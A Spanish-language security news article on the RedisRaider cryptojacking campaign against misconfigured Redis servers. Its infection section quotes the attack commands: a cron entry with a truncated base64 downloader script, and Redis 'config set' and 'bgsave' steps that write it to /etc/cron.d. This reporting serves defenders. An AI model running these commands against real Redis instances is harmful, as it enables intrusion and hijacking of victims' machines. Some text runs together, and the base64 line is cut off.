Ha surgido una nueva y sofisticada campaña de cryptojacking de Linux llamada RedisRaider, que apunta a servidores Redis vulnerables en todo Internet. Este malware agresivo explota instancias de Redis mal configuradas para implementar software de minería de criptomonedas, convirtiendo los sistemas comprometidos en granjas de minería digital para los atacantes.
RedisRaider emplea capacidades similares a las de un gusano, escaneando continuamente porciones aleatorias del espacio IPv4 para identificar objetivos vulnerables adicionales, creando una red autopropagante de sistemas infectados.
El vector de ataque es particularmente preocupante, ya que aprovecha comandos de configuración legítimos de Redis en lugar de explotar vulnerabilidades del software. Al apuntar a instancias de Redis de acceso público que se ejecutan sin la autenticación o los controles de acceso adecuados, los atacantes pueden manipular la configuración de Redis para ejecutar comandos arbitrarios en los sistemas Linux subyacentes.
Una vez que se obtiene acceso, el malware implementa una bifurcación del popular minero XMRig para generar la criptomoneda Monero para los atacantes, consumiendo importantes recursos computacionales de los sistemas de las víctimas.
Los investigadores de DATADOG Security Labs identificaron la campaña a través de sus sistemas de monitoreo y notaron patrones inusuales de abuso de configuración de Redis que aparecían en múltiples entornos de clientes. El equipo de seguridad observó los mecanismos de persistencia y las técnicas de ofuscación únicos del malware, que demuestran una sofisticación considerable más allá de las típicas operaciones oportunistas de cryptojacking.
El impacto de RedisRaider se extiende más allá del robo de recursos, ya que el malware modifica las configuraciones del sistema y mantiene la persistencia a través de trabajos cron. Los atacantes han implementado un enfoque múltiple para generar ingresos, alojando no solo cargas útiles de criptojacking del lado del servidor, sino también mineros de Monero basados en la web en la infraestructura relacionada.
Esto indica un esfuerzo coordinado por parte de actores de amenazas con experiencia en el desarrollo de malware y conocimiento de Redis, programación Go y componentes internos de Linux. Los atacantes emplean sutiles medidas antiforenses, incluidas claves de corta duración con configuraciones de tiempo de vida (TTL) de solo 120 segundos, lo que dificulta que los defensores detecten y analicen la actividad maliciosa después del hecho.
Estas técnicas sugieren una evolución en las tácticas de cryptojacking, pasando de enfoques rudimentarios a operaciones más sofisticadas diseñadas para maximizar las ganancias y minimizar la detección.
Mecanismo de infección mediante la manipulación de la configuración de Redis
El proceso de infección de RedisRaider comienza escaneando en busca de instancias de Redis expuestas en el puerto predeterminado 6379. Al identificar un objetivo potencial, el malware emite el Comando INFO para verificar que el servidor Redis se esté ejecutando en Linux.
Si se confirma, comienza la fase de explotación utilizando Redis con el SET para crear una clave que contiene un script de shell codificado en base64 formateado como una entrada cron:
set t "*/1 * * * * root sh -c 'echo dT0iaHR0cDovL2EuaGJ3ZWIuaWN10jgwODAvdXBsb2Fkcy8yLuego, el malware manipula las configuraciones de Redis con la siguiente secuencia de comandos para escribir este contenido en el directorio cron:
config set dir "/etc/cron.d"
config set dbfilename "apache"
bgsaveEsto redirige el volcado de la base de datos de Redis a /etc/cron.d/apache, donde el programador cron lo interpretará como un trabajo legítimo y ejecutará el script codificado en base64 incorporado.
El script, una vez decodificado, descarga la carga útil principal de RedisRaider desde la infraestructura del atacante a /tmp/mysql, lo hace ejecutable y lo inicia en segundo plano usando nohuppara garantizar la persistencia incluso si el proceso padre finaliza.
La carga útil principal está fuertemente ofuscada usando Garble, un ofuscador de tiempo de compilación para Go.
Contiene una versión empaquetada e integrada del minero de criptomonedas XMRig, que descomprime en tiempo de ejecución, estableciendo una conexión con los grupos de minería para generar ingresos para los atacantes mientras escanea continuamente e infecta servidores Redis vulnerables adicionales.
